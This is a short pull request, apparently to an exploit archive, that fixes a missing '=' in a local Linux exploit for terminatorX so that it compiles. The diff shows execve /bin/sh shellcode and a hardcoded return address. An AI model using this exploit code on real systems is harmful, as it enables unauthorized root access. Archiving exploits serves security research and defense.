### PR TITLE
TerminatorX script fixed

### DIFF
--- a/platforms/linux/local/120.c
+++ b/platforms/linux/local/120.c
@@ -59,7 +59,7 @@
 #define PATH "/usr/local/bin/terminatorX"
 #define RET 0xbffff69e
 
-char shellcode[] "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3"
+char shellcode[]= "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3"
       "\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80";
 
 char *buffer,*ptr;


### PR DESCRIPTION
Not throwing error "error: expected ';' after top level declarator" any more